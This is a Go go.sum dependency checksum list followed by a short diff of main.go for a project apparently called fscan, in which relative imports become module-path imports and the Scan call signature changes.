github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0=
github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q=
github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A=
github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw=
github.com/golang/protobuf v1.3.4/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw=
github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8=
github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA=
github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs=
github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w=
github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0=
github.com/golang/protobuf v1.4.1 h1:ZFgWrT+bLgsYPirOnRfKLYJLvssAegOj/hgyMFdJZe0=
github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8=
github.com/google/cel-go v0.4.2 h1:Fx1DQPo05qFcDst4TwiGgFfmTjjHsLLbLYQGX67QYUk=
github.com/google/cel-go v0.4.2/go.mod h1:0pIisECLUDurNyQcYRcNjhGp0j/yM6v617EmXsBJE3A=
github.com/google/cel-spec v0.4.0/go.mod h1:2pBM5cU4UKjbPDXBgwWkiwBsVgnxknuEJ7C5TDWwORQ=
github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M=
github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4=
github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
github.com/jlaffaye/ftp v0.0.0-20201112195030-9aae4d151126 h1:ly2C51IMpCCV8RpTDRXgzG/L9iZXb8ePEixaew/HwBs=
github.com/jlaffaye/ftp v0.0.0-20201112195030-9aae4d151126/go.mod h1:2lmrmq866uF2tnje75wQHzmPXhmSWUt7Gyx2vgK1RCU=
github.com/lib/pq v1.8.0 h1:9xohqzkUwzR4Ga4ivdTcawVS89YSDVxXMa3xJX3cGzg=
github.com/lib/pq v1.8.0/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o=
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA=
github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 h1:GVFkBBJAEO3CpzIYcDDBdpUObzKwVW9okNWcLYL/nnU=
github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8/go.mod h1:phLSETqH/UJsBtwDVBxSfJKwwkbJcGyy2Q/h4k+bmww=
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0=
github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/crypto v0.0.0-20201116153603-4be66e5b6582 h1:0WDrJ1E7UolDk1KhTXxxw3Fc8qtk5x7dHP431KHEJls=
golang.org/x/crypto v0.0.0-20201116153603-4be66e5b6582/go.mod h1:tCqSYrHVcf3i63Co2FzBkTCo2gdF6Zak62921dSfraU=
golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE=
golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU=
golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20200505041828-1ed23360d12c h1:zJ0mtu4jCalhKg6Oaukv6iIkb+cOvDrajDH9DH46Q4M=
golang.org/x/net v0.0.0-20200505041828-1ed23360d12c/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3 h1:5B6i6EAiSYyejWfvc5Rc9BbI3rzIsrrXfAQBWnYfn+w=
golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/term v0.0.0-20201113234701-d7a72108b828 h1:htWEtQEuEVJ4tU/Ngx7Cd/4Q7e3A5Up1owgyBtVsTwk=
golang.org/x/term v0.0.0-20201113234701-d7a72108b828/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
golang.org/x/text v0.3.2 h1:tW2bmiBqwgJj/UpqtC8EpXEZVYOwU0yG4iWbprSVAcs=
golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY=
golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM=
google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4=
google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc=
google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc=
google.golang.org/genproto v0.0.0-20200305110556-506484158171/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
google.golang.org/genproto v0.0.0-20200430143042-b979b6f78d84 h1:pSLkPbrjnPyLDYUO2VM9mDLqo2V6CFBY84lFSZAfoi4=
google.golang.org/genproto v0.0.0-20200430143042-b979b6f78d84/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c=
google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg=
google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY=
google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk=
google.golang.org/grpc v1.27.1/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk=
google.golang.org/grpc v1.29.1 h1:EC2SB8S04d2r73uptxphDSUG+kTKVgjRPF+N3xpxRB4=
google.golang.org/grpc v1.29.1/go.mod h1:itym6AZVZYACWQqET3MqgPpjcuV5QH3BxFS3IjizoKk=
google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8=
google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0=
google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM=
google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE=
google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo=
google.golang.org/protobuf v1.22.0 h1:cJv5/xdbk1NnMPR1VP9+HU6gupuG9MLBoH1r6RHZ2MY=
google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
gopkg.in/yaml.v3 v3.0.0-20200615113413-eeeca48fe776 h1:tQIYjPdBoyREyB9XMu+nnTclpTYkz2zFM+lzLJFO4gQ=
gopkg.in/yaml.v3 v3.0.0-20200615113413-eeeca48fe776/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=

13
main.go
View File

@@ -1,20 +1,15 @@
package main
import (
"./common"
"./Plugins"
"fmt"
"github.com/shadow1ng/fscan/Plugins"
"github.com/shadow1ng/fscan/common"
)
func main() {
var Info common.HostInfo
common.Flag(&Info) //fmt.Println(Info.Host,Info.Ports)
common.Flag(&Info)
common.Parse(&Info)
Plugins.Scan(&Info)
Plugins.Scan(Info)
fmt.Println("scan end")
}